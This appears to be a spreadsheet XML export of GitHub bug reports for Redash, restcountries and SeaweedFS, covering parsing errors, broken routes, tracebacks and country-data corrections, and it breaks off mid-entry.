    <t>&lt;!--  # # Need support? USE THE FORUM! https://discuss.redash.io/c/support. # # Don't have steps to reproduce and actually not sure it's a bug? # Use the forum! https://discuss.redash.io/c/support. #  **Got an idea for a new feature?** Check if it isn't on the roadmap already: http://bit.ly/redash-roadmap and start a new discussion in the features category: https://discuss.redash.io/c/feature-requests . Found a bug? Please fill out the sections below thank you --&gt;  Issue Summary With LDAP auth enabled, app routes url to '/ldap/login' based on ldap_auth.py in authentication. Template login page redirects to '/ldap_auth/login' which returns a 404 since there is no route pointing to that url.  Steps to Reproduce 1. enable LDAP auth 2. navigate to localhost and click link to SSO login page 3. observe 404 Fix: adjust route in /authentication/ldap_auth.py  Technical details: * Redash Version: redash.3.0.0.b3134 * Browser/OS: Chrome * How did you install Redash: ami</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2504</t>
  </si>
  <si>
    <t>BUG: Google Sheets parsing does not respect guessed column type</t>
  </si>
  <si>
    <t>I have a google sheet with columns `id`, `name` and `abbreviation`. One of the rows has values: |id|name|abbreviation| |--|--|--| |||| |3569|Nantes|NAN| |||| Redash is able to query the sheet and retrieve the data. However it fails to render it in browser and returns the error: ![image](https://user-images.githubusercontent.com/14027470/39469398-e3af900c-4d2f-11e8-801b-95bdcbaa6a0f.png) Inspecting in chrome dev tools, we see a 200 response from api for `query_results` but error at `JSON.parse`: ![image](https://user-images.githubusercontent.com/14027470/39469437-12668eb4-4d30-11e8-8a4a-280b6b017866.png) Inspecting the response at position 2520006 we see the following JSON object: json {"abbreviation": NaN, "id": 3569, "name": "Nantes"}  We also see that redash correctly guessed the type of column for abbreviation as `string` if we inspect the `columns` array of the response: json { "columns": [{ "friendly_name": "id", "type": "integer", "name": "id" }, { "friendly_name": "name", "type": "string", "name": "name" }, { "friendly_name": "abbreviation", "type": "string", "name": "abbreviation" }] }  This means that the backend is incorrectly parsing and storing the data. Looking at how the Google Sheets query runner works, it roughly does the following upon getting the data: 1. inspect some rows to determine the column type `_guess_type` https://github.com/getredash/redash/blob/3edec570f17ff3052b01abd8dd75c7c343940f90/redash/query_runner/google_spreadsheets.py#L27-L47 1. parse the data for every row https://github.com/getredash/redash/blob/3edec570f17ff3052b01abd8dd75c7c343940f90/redash/query_runner/google_spreadsheets.py#L118 https://github.com/getredash/redash/blob/3edec570f17ff3052b01abd8dd75c7c343940f90/redash/query_runner/google_spreadsheets.py#L50 `_value_eval_list` does not seem to take into account the guessed type of the column which means it parses it independently. It parses the value for each data type until it succeeds or assumes `STRING`. in Python `float("NAN")` actually returns a float `NaN`. Here's an example: https://repl.it/repls/SteelOnlyLoopfission This is tested with Python 2.7.x and redash version 3.0.0+b3134 ## Solution One solution is to refactor/rewrite the `_value_eval_list` function to take in second parameter `col_type` and update the multiple if clauses to switch on col_type for member. Pseudo code: python def _value_eval_list(value, col_types): value_list = [] raw_values = zip(col_types,value) for rv in raw_values: if (rv[1] == TYPE_FLOAT): value_list.append(float(rv[0])) if (rv[1] == TYPE_STRING): value_list.append(rv[0])  return value_list  Calling this function might look like (inside `parse_worksheet()` line 117-118): python column_types = [c['type'] for c in columns] rows = [dict(zip(column_names, _value_eval_list(row , column_types for row in worksheet[HEADER_INDEX + 1:]]  ## Further Investigation More investigation is required but I think that's the issue and solution. I have _not_ tested this in Redash v4. Based on master branch it looks like it is an issue.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2718</t>
  </si>
  <si>
    <t>Cannot select a query to use for a new alert or search queries when adding a widget to a dashboard</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When creating a new alert, the query search doesn't find any queries to create alerts from. Similarly, the query search in "Add Widget" dialog of a dashboard finds no results.  Steps to Reproduce 1. Create a query named "Alert" 2. Go to the "New Alert" page 3. Try to search for the query you just created ("Alert") When the search happens, the following error is logged to the web console: &gt; Error: "[$resource:badcfg] Error in resource configuration for action `search`. Expected response to contain an array but got an object (Request: get api/queries/search) It seems that #2686 changed the response format for the query search, but the model (https://github.com/getredash/redash/blob/a014df36d86ab78974befe979d68c9ef5378634b/client/app/services/query.js#L290-L295) and (some) callers of that .search() method were not converted to use the new API.  Technical details: * Redash Version: 5.0.0-beta (a014df3) * Browser/OS: Firefox 61 / Linux * How did you install Redash: Built from source</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2856</t>
  </si>
  <si>
    <t>Data Source page fail to load</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Cannot view Data Source page ![image](https://user-images.githubusercontent.com/5693018/46110589-c8329180-c1ec-11e8-8633-5480ae9bd72d.png)  Steps to Reproduce 1. Run redash on last commit  Technical details: * Redash Version: 5.0.0 * Browser/OS: Chrome/Windows * How did you install Redash: Docker installation Error in logs:  Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 2000, in __call__ return self.wsgi_app(environ, start_response) File "/usr/local/lib/python2.7/dist-packages/werkzeug/contrib/fixers.py", line 152, in __call__ return self.app(environ, start_response) File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1991, in wsgi_app response = self.make_response(self.handle_exception(e)) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 271, in error_router return original_handler(e) File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1567, in handle_exception reraise(exc_type, exc_value, tb) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 268, in error_router return self.handle_error(e) File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1988, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1641, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 271, in error_router return original_handler(e) File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1544, in handle_user_exception reraise(exc_type, exc_value, tb) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 268, in error_router return self.handle_error(e) File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1639, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python2.7/dist-packages/flask/app.py", line 1625, in dispatch_request return self.view_functions[rule.endpoint](**req.view_args) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 477, in wrapper resp = resource(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_login/utils.py", line 228, in decorated_view return func(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask/views.py", line 84, in view return self.dispatch_request(*args, **kwargs) File "/app/redash/handlers/base.py", line 31, in dispatch_request return super(BaseResource, self).dispatch_request(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/flask_restful/__init__.py", line 587, in dispatch_request resp = meth(*args, **kwargs) File "/app/redash/permissions.py", line 48, in decorated return fn(*args, **kwargs) File "/app/redash/handlers/data_sources.py", line 30, in get page = 'admin/data_source' + str(ds.id) AttributeError: 'dict' object has no attribute 'id'  Its seems that it happens because this commit 6 hours ago: https://github.com/getredash/redash/commit/34e39eda4a02916380b47c1e20849a372926e083#diff-e4f1edabf1a4b181b47d35025f0070ad</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2858</t>
  </si>
  <si>
    <t>Cannot retrieve Athena/Glue schema</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Redash cannot retrieve Athena(Glue) schema  Steps to Reproduce - Setup an Athena data source using Glue catalog - Attempt to list schemas in either UI or via API directly  % http redash.clasia.internal/api/data_sources/1/schema Authorization:redacted HTTP/1.1 200 OK Connection: keep-alive Content-Encoding: gzip Content-Type: application/json Date: Thu, 27 Sep 2018 03:05:09 GMT Server: nginx/1.9.10 Transfer-Encoding: chunked { "error": { "code": 2, "message": "Error retrieving schema." } }  Changing the redash log level to debug, and monitoring logs via `docker-compose logs --tail=0 --follow` I can see the boto debug logger listing and describing all Glue catalog tables and their data schemas. This does not appear to be an IAM permissions issue. There is no indication of an internal failure within redash.  Technical details: * Redash Version: 5.0.0+b4754 * Browser/OS: Backend issue * How did you install Redash: From AMI ami-0fcac8599721ee168</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/2965</t>
  </si>
  <si>
    <t>GA Data Source throws an error when no rows returned</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary Google Analytics Data Source throws `Error running query: 'rows'` when the query result is empty. I have a pretty simple query with dimensions and filters, like: json { "ids": "ga:177xxxxxx", "start_date": "2018-10-08", "end_date": "2018-10-12", "metrics": "ga:uniqueEvents", "dimensions": "ga:dimension1,ga:dimension3", "filters": "ga:dimension2==userrole;ga:eventCategory==eventcategory;ga:eventAction==enentaction;ga:dimension1!=demo" }  Sometimes it returns empty result as there is no data. This results in error in redash.  Steps to Reproduce 1. Create the Google Analytics Data Source 2. Make some query returning zero rows 3. Execute it in query editor `Error running query: 'rows'` will be thrown. While this might be considered not a bug, I'd expect just an empty result with no errors.  Technical details: * Redash Version: 5.0.1 * Browser/OS: Chrome/macOS * How did you install Redash: docker-compose</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3034</t>
  </si>
  <si>
    <t>redash chokes on `select 'NaN'::double precision`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary  Steps to Reproduce Try running this query against a Postgres datasource:  select 'NaN'::double precision  It'll take about 15 seconds or so, and eventually you'll get:  Error running query: failed communicating with server. Please check your Internet connection and try again.  The javascript console in Chrome says:  SyntaxError: Unexpected token N in JSON at position 226 at JSON.parse (&lt;anonymous&gt;) at Y (angular.js:1345) at Mt (angular.js:10878) at angular.js:10969 at i (angular.js:325) at Tt (angular.js:10968) at l (angular.js:11828) at s (angular.js:16696) at angular.js:16712 at f.$eval (angular.js:17994)   Technical details: * Redash Version: 5.0.1 * Browser/OS: Chrome * How did you install Redash: Docker image  Workaround  select 'NaN'::double precision::text </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3294</t>
  </si>
  <si>
    <t>Forked queries cannot be scheduled to recur</t>
  </si>
  <si>
    <t xml:space="preserve">As described here: https://github.com/getredash/redash/pull/2426#issuecomment-454827177 This is due to forked queries having a `None` value for `schedule` but the UI expects the schedule format to be like  { 'interval': , 'until': , 'day_of_week': , 'time':  } </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3297</t>
  </si>
  <si>
    <t>Pending invitation links broken in latest version</t>
  </si>
  <si>
    <t>&lt;!-- We use GitHub only for bug reports Anything else should be posted to https://discuss.redash.io For support, help &amp; questions use https://discuss.redash.io/c/support For feature requests &amp; ideas use https://discuss.redash.io/c/feature-requests **Found a security vulnerability?** Please email security@redash.io to report any security vulnerabilities. We will acknowledge receipt of your vulnerability and strive to send you regular updates about our progress. If you're curious about the status of your disclosure please feel free to email us again. If you want to encrypt your disclosure email, you can use this PGP key. --&gt;  Issue Summary It looks like the change in #3261 doesn't handle the case of existing users that haven't accepted their invitations yet, so users trying to sign up using invitations created in a previous version incorrectly get the "This invitation has already been accepted" message. https://github.com/getredash/redash/pull/3229/files#diff-a0c5448134fdb627ae48d25bad76393fR40 I was able to fix this in our org with: sql UPDATE users SET details = '{"is_invitation_pending": true}'::json WHERE password_hash IS NULL  Maybe this case should be handled in the migration here? https://github.com/getredash/redash/blob/master/migrations/versions/e7f8a917aa8e_add_user_details_json_column.py  Steps to Reproduce 1. Send invitation from a version prior to #3229 and #3261 2. Upgrade to current master 3. Try to access the invitation link Any other info e.g. Why do you consider this to be a bug? What did you expect to happen instead?  Technical details: * Redash Version: * Browser/OS: * How did you install Redash:</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3372</t>
  </si>
  <si>
    <t>When creating a visualisation after running a query the query results are deleted</t>
  </si>
  <si>
    <t>We are testing the latest stable version of redash (6.0.0+b10818 (7fa66654) Found a regression when creating a new visualization, to reproduce: 0. Open a new browser tab and log into redash 1. Run a query 2. Create a new visualization 3. The X &amp; Y drop downs are empty 4. When you cancel the visualization creation you see that the query results disappeared Note - the issue occurs only when you run redash for the first time on a new session</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3394</t>
  </si>
  <si>
    <t>InvalidParameterError causes query results to fail with 500 instead of 400 status code</t>
  </si>
  <si>
    <t xml:space="preserve"> title </t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3562</t>
  </si>
  <si>
    <t>Issues with Query Based Dropdown when the value is numeric</t>
  </si>
  <si>
    <t>When the values the query returns for the dropdown are numeric, we have two issues: 1. We dont load the correct value because the value from the URL passed as string, while the actual value is a number. 2. We dont load results at all, because they fail parameter schema validation (the string doesn't match the values the dropdown has, which are numbers).</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3711</t>
  </si>
  <si>
    <t>Cannot Add Query-based Dropdown Parameter to a Saved Query</t>
  </si>
  <si>
    <t>&lt;!-- We use GitHub only for bug reports Anything else should be posted to https://discuss.redash.io For support, help &amp; questions use https://discuss.redash.io/c/support For feature requests &amp; ideas use https://discuss.redash.io/c/feature-requests **Found a security vulnerability?** Please email security@redash.io to report any security vulnerabilities. We will acknowledge receipt of your vulnerability and strive to send you regular updates about our progress. If you're curious about the status of your disclosure please feel free to email us again. If you want to encrypt your disclosure email, you can use this PGP key. --&gt;  Issue Summary On a new query, query-based dropdown parameters get their values from `/api/queries/:id/dropdown` and on saved queries they get them by association from their parent query id (`/api/queries/:parent_id/dropdowns/:id`). When adding a query-based dropdown parameter to a saved query, the association is not yet created which results in a 403.  Steps to Reproduce 1. Create a new query without a parameter 2. Save it 3. Add a query-based parameter to the query. 4. The dropdown is not populated with values (a 403 occurs)</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/3736</t>
  </si>
  <si>
    <t>Exporting data should returns SQL types and not python types</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Summary When I export the result of a select, the primitive types returned are those of Python and not those of sql, booleans usually come as False/True rather than false/true. A summary of the issue and the browser/OS environment in which it occurs.  Steps to Reproduce 1. Select data from any table 2. Export the data.  Technical details: * Redash Version: 7.0.0+b17535 (15c815fb) * Browser/OS: Chrome/Ubuntu * How did you install Redash:</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/4099</t>
  </si>
  <si>
    <t>Dashboards list includes dashboards with text widgets where you have no access to any other widgets</t>
  </si>
  <si>
    <t>in this case, a use named A, he has not have any datasource access or view permission, while the dashboard have a text widget, the user A can find the dashboard which have text widget on dashboard lis page, the reason is than this python file: app/redash/model/__init__.py about the class Dashboard with that method : python @classmethod def all(cls, org, group_ids, user_id): query = ( Dashboard.query .options( subqueryload(Dashboard.user).load_only('_profile_image_url', 'name'), ) .outerjoin(Widget) .outerjoin(Visualization) .outerjoin(Query) .outerjoin(DataSourceGroup, Query.data_source_id == DataSourceGroup.data_source_id) .filter( Dashboard.is_archived == False, (DataSourceGroup.group_id.in_(group_ids) | (Dashboard.user_id == user_id) ((Widget.dashboard != None) &amp; (Widget.visualization == None, Dashboard.org == org) .distinct()) query = query.filter(or_(Dashboard.user_id == user_id, Dashboard.is_draft == False)) return query  the query on Widget.visualization == None so will find all dashboard that have text widget * Redash Version: 6.0.7.0.8.0 * Browser/OS: chrome/ios * How did you install Redash: k8s</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/4469</t>
  </si>
  <si>
    <t>Redash can't create user from Google with long profile_image_url</t>
  </si>
  <si>
    <t xml:space="preserve"> Redash can't create user with long profile_image_url My coworker tried to login to redash and it failed.  [2019-12-20 14:32:12,927] ERROR in app: Exception on /oauth/google_callback [GET] Traceback (most recent call last): File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1982, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1614, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python2.7/site-packages/flask_restful/__init__.py", line 271, in error_router return original_handler(e) File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1517, in handle_user_exception reraise(exc_type, exc_value, tb) File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1612, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1598, in dispatch_request return self.view_functions[rule.endpoint](**req.view_args) File "/app/redash/authentication/google_oauth.py", line 101, in authorized user = create_and_login_user(org, profile['name'], profile['email'], picture_url) File "/app/redash/authentication/__init__.py", line 257, in create_and_login_user models.db.session.commit() File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/scoping.py", line 153, in do return getattr(self.registry(), name)(*args, **kwargs) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 943, in commit self.transaction.commit() File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 467, in commit self._prepare_impl() File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 447, in _prepare_impl self.session.flush() File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 2254, in flush self._flush(objects) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 2380, in _flush transaction.rollback(_capture_exception=True) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/util/langhelpers.py", line 66, in __exit__ compat.reraise(exc_type, exc_value, exc_tb) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/session.py", line 2344, in _flush flush_context.execute() File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/unitofwork.py", line 391, in execute rec.execute(self) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/unitofwork.py", line 556, in execute uow File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/persistence.py", line 181, in save_obj mapper, table, insert) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/orm/persistence.py", line 866, in _emit_insert_statements execute(statement, params) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/base.py", line 948, in execute return meth(self, multiparams, params) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/sql/elements.py", line 269, in _execute_on_connection return connection._execute_clauseelement(self, multiparams, params) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/base.py", line 1060, in _execute_clauseelement compiled_sql, distilled_params File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/base.py", line 1200, in _execute_context context) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/base.py", line 1413, in _handle_dbapi_exception exc_info File "/usr/local/lib/python2.7/site-packages/sqlalchemy/util/compat.py", line 265, in raise_from_cause reraise(type(exception), exception, tb=exc_tb, cause=cause) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context context) File "/usr/local/lib/python2.7/site-packages/sqlalchemy/engine/default.py", line 509, in do_execute cursor.execute(statement, parameters) DataError: (psycopg2.DataError) value too long for type character varying(320) [SQL: 'INSERT INTO users (updated_at, created_at, org_id, name, email, profile_image_url, password_hash, groups, api_key, disabled_at, details) VALUES (now(), now(), %(org_id)s, %(name)s, %(email)s, %(profile_image_url)s, %(password_hash)s, %(groups)s, %(api_key)s, %(disabled_at)s, %(details)s) RETURNING users.id'] [parameters: {'name': u'&lt;redacted&gt;', 'org_id': &lt;redacted&gt;, 'profile_image_url': u'https://lh3.googleusercontent.com/a-/AAuE7mCQC1y8a0Bew0vZ3zVr835IDK1pq8_J75Jy4YNUwe2TdaYqr8vJBF1eQB8k5u6kooonWTfrnVdpOjR3_Epvit-sKbkbjq12GgcW6qv1iva  (517 characters truncated)  JfmDWlN_ESNOyJu6JRgNKLqFN5pJQJQ44IcS0OEt5ozElvbEV35vX7sw-OBptVnBUPW4wy9cElsIhnw8ISHgp8zSqJhwQfrn5bII6fN42EMrq1_sv66KBAm-0NIit0QYWkocdT58V4PClb8?sz=40', 'disabled_at': None, 'details': '{"is_invitation_pending": false}', 'groups': [2], 'api_key': '&lt;redacted&gt;', 'email': u'&lt;redacted&gt;', 'password_hash': None}] (Background on this error at: http://sqlalche.me/e/9h9h)  Turns out, he had basic auto-generated one letter avatar \([more info](https://gsuiteupdates.googleblog.com/2015/09/change-to-default-avatar-for-google.html)\) for which Google returns profile_image_url 815 characters long. Maybe they generate it on the fly, who knows. We changed this auto-generated avatar to a normal one and it succeeded.  Steps to Reproduce 1. Have an user in identity provider (G suite in our case) with profile_image_url longer than 320 characters 2. Try to login first time 3. Get internal server error  Technical details: * Redash Version: 8.0 * Browser/OS: Chrome * How did you install Redash: Helmchart</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/4893</t>
  </si>
  <si>
    <t>Admin shows n/a for started value in manager column</t>
  </si>
  <si>
    <t>&lt;!-- We use GitHub only for bug reports Anything else should be posted to https://discuss.redash.io For support, help &amp; questions use https://discuss.redash.io/c/support For feature requests &amp; ideas use https://discuss.redash.io/c/feature-requests **Found a security vulnerability?** Please email security@redash.io to report any security vulnerabilities. We will acknowledge receipt of your vulnerability and strive to send you regular updates about our progress. If you're curious about the status of your disclosure please feel free to email us again. If you want to encrypt your disclosure email, you can use this PGP key. --&gt;  Issue Summary When going to the admin section you can see in the manager column that the "Started" value is always "n/a". &lt;img width="630" alt="CleanShot 2020-05-15 at 01 58 09@2x" src="https://user-images.githubusercontent.com/1610/81997320-b31fa600-964f-11ea-90c0-e0c2988fdcce.png"&gt;  Steps to Reproduce I **think** this a regression from first https://github.com/getredash/redash/commit/26f0ce0749c1f683ba3b8f0b1d2a9e70cb6ea0e2#diff-5ca0dc869c9c3218d8a95ba7f99f5f4cL460 where it removed the QueryTaskTracker and by that the ability to store the `started_at` time and then later when Celery was removed, where this code path became no-op. Originally this value was shown in v6.0.0 here: https://github.com/getredash/redash/blob/4780bd9c5ef212dd4c38bafb525abc991812d59b/client/app/pages/admin/status/status.html#L35 Now it's pulled in from the `/status.json` api in https://github.com/getredash/redash/blob/8010781f0d3d14260523e135a5abef0847714b9e/client/app/pages/admin/SystemStatus.jsx#L47 but the value behind is not set anymore in https://github.com/getredash/redash/blob/8010781f0d3d14260523e135a5abef0847714b9e/redash/tasks/queries/maintenance.py#L95-L101. Any other info e.g. Why do you consider this to be a bug? What did you expect to happen instead?  Technical details: * Redash Version: 8010781f0d3d14260523e135a5abef0847714b9e * Browser/OS: Firefox macOS * How did you install Redash: Docker</t>
  </si>
  <si>
    <t>https://github.com/RefugeRestrooms/refugerestrooms/issues/295</t>
  </si>
  <si>
    <t>Guess Your Location does not return valid nearby restrooms</t>
  </si>
  <si>
    <t>&lt;img width="590" alt="screen shot 2017-03-13 at 8 04 54 pm" src="https://cloud.githubusercontent.com/assets/5265597/23884178/777bc81c-0828-11e7-9eb9-583d7570a98c.png"&gt; The Guess your location tool should show stuff nearby your location by distance order, currently its showing stuff on the opposite side of the country. Related PRs: https://github.com/RefugeRestrooms/refugerestrooms/pull/112 https://github.com/RefugeRestrooms/refugerestrooms/pull/110 https://github.com/RefugeRestrooms/refugerestrooms/pull/107</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/116</t>
  </si>
  <si>
    <t>Country translation</t>
  </si>
  <si>
    <t>Hi Morocco in Arabic is "" not "" I hope you correct it as soon as possible Thranx</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/118</t>
  </si>
  <si>
    <t>Countries Aruba(AW) and Curaao (CW) show wrong language</t>
  </si>
  <si>
    <t>It shows {"iso639_1":"pa","iso639_2":"pan","name":"(Eastern) Punjabi","nativeName":""}. It should actually be , but it should be {"iso639_2":"pap","name":"Papiamento","nativeName":"Papiamentu"}. Either change it to this, or remove completely, as Punjabi is not spoken anywhere in the caribbean. It could be added to Bonaire (BQ) as well.</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/120</t>
  </si>
  <si>
    <t>Chad borders array missing Sudan</t>
  </si>
  <si>
    <t>Hi there, https://restcountries.eu/rest/v2/alpha/tcd The borders for Chad (TCD) is missing Sudan (SDN) - could this be added please?</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/156</t>
  </si>
  <si>
    <t>Capital of Vatican City incorrect</t>
  </si>
  <si>
    <t>The capital city of Vatican City is listed as Rome, however, the capital is Vatican City.</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/177</t>
  </si>
  <si>
    <t>Incomplete currency/language list for Antarctica</t>
  </si>
  <si>
    <t>There is an incomplete currency list for "Antarctica". It should include Chilean Peso CLP and Spanish. Below a portion of the response with available currencies and languages.  { "name" : "Antarctica", "alpha2Code" : "AQ", "callingCodes" : [ "672" ], "region" : "Polar", "timezones" : [ "UTC-03:00", "UTC+03:00", "UTC+05:00", "UTC+06:00", "UTC+07:00", "UTC+08:00", "UTC+10:00", "UTC+12:00" ], "nativeName" : "Antarctica", "currencies" : [ { "code" : "AUD", "name" : "Australian dollar", "symbol" : "$" }, { "code" : "GBP", "name" : "British pound", "symbol" : "" } ], "languages" : [ { "iso639_1" : "en", "iso639_2" : "eng", "name" : "English", "nativeName" : "English" }, { "iso639_1" : "ru", "iso639_2" : "rus", "name" : "Russian", "nativeName" : "" } ] }</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/179</t>
  </si>
  <si>
    <t>Too many Time Zones for France</t>
  </si>
  <si>
    <t>- Actual data received : ![image](https://user-images.githubusercontent.com/52750054/83772457-b07b0400-a683-11ea-9bbb-cf1edf340d1b.png) - Should be : UTC+2</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/184</t>
  </si>
  <si>
    <t>Faroe Islands are not a part of the EU</t>
  </si>
  <si>
    <t>`https://restcountries.eu/rest/v2/regionalbloc/eu` lists Faroe Islands as part of the EU. Wikipedia says the following and it seems to be right in this case: &gt; As explicitly asserted by both treaties of the European Union, the Faroe Islands are not part of the European Union.</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/199</t>
  </si>
  <si>
    <t>Wrong Country Name</t>
  </si>
  <si>
    <t>Hello. Country with code: "alpha2Code": "MK", "alpha3Code": "MKD" Has wrong name. The official name according the UN.org is the Republic of North Macedonia (short form: North Macedonia) https://www.un.org/en/member-states/#gotoN</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/201</t>
  </si>
  <si>
    <t>Wrong UTC time in Tbilisy, Georgia</t>
  </si>
  <si>
    <t>It has timezones: ["UTC-05:00"]. The correct one is UTC+04:00 (https://24timezones.com/Georgia/time)</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/202</t>
  </si>
  <si>
    <t>Brazil should border Suriname</t>
  </si>
  <si>
    <t>If you check the bordering countries of Suriname https://restcountries.eu/rest/v2/name/suriname, you will see that France is a bordering country. However, for Brazil, this isn't the case https://restcountries.eu/rest/v2/name/brazil while it should</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/209</t>
  </si>
  <si>
    <t>UK (GB) is not EU anymore !</t>
  </si>
  <si>
    <t>API still outputs it as an EU country.</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/221</t>
  </si>
  <si>
    <t>Wrong native name for Luxembourg</t>
  </si>
  <si>
    <t>The native name for Luxembourg isn't Luxembourg. That would be the English or french name. in Luxemburgish its "Ltzebuerg"</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/226</t>
  </si>
  <si>
    <t>Kuwait borders</t>
  </si>
  <si>
    <t>"borders":["IRN","SAU"] the correct is Iraq and not Iran</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/235</t>
  </si>
  <si>
    <t>Change name capital of Ukraine</t>
  </si>
  <si>
    <t>You have wrong name capital of Ukraine, in your API use Kiev ithis transcription name used only russian who live in Russia, in all world used valid name Kyiv https://en.wikipedia.org/wiki/Kyiv#cite_note-12 #KyivNotKiev</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/237</t>
  </si>
  <si>
    <t>There should be Nepal in border countries of China</t>
  </si>
  <si>
    <t>If you try to fetch border countries of Nepal then there is China and India. If you fetch borders of India then there is Nepal too but when you fetch borders of China then there is not Nepal which there must be.</t>
  </si>
  <si>
    <t>https://github.com/apilayer/restcountries/issues/249</t>
  </si>
  <si>
    <t>Swaziland Country Name</t>
  </si>
  <si>
    <t>This is not Swaziland any more, its "Eswatini" the offical name of this country.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/16</t>
  </si>
  <si>
    <t>content type from volume post upload always text/plain?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm assuming the return content-type should be application/json?  $ curl -v -F "file=@/tmp/test.json;type=application/json" localhost:8080/7,07a27ee211 &gt; POST /7,07a27ee211 HTTP/1.1 &gt; User-Agent: curl/7.30.0 &gt; Host: localhost:8080 &gt; Accept: */* &gt; Content-Length: 223 &gt; Expect: 100-continue &gt; Content-Type: multipart/form-data; boundary=2f1cf300fd2b &gt; &lt; HTTP/1.1 100 Continue &lt; HTTP/1.1 201 Created &lt; Date: Mon, 29 Sep 2014 20:08:45 GMT &lt; Content-Length: 30 &lt; Content-Type: text/plain; charset=utf-8 &lt; * Connection #0 to host localhost left intact {"name":"test.json","size":74} </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/26</t>
  </si>
  <si>
    <t>File id assign with collection does not work</t>
  </si>
  <si>
    <t>File id assign with collection does not work on master server curl http://master:9333/dir/assign?collection=pictures returns {"fid":"22,0139804a34","url":"127.0.0.1:8080","publicUrl":"172.17.42.1:8080","count":1} But volume id 22 is not collection named volume id such as 22.dat 22.idx No new collection is created with above command. weed version is 0.65 linux amd64 Thanks in advance</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/37</t>
  </si>
  <si>
    <t>redirectOnRead goes to localhost</t>
  </si>
  <si>
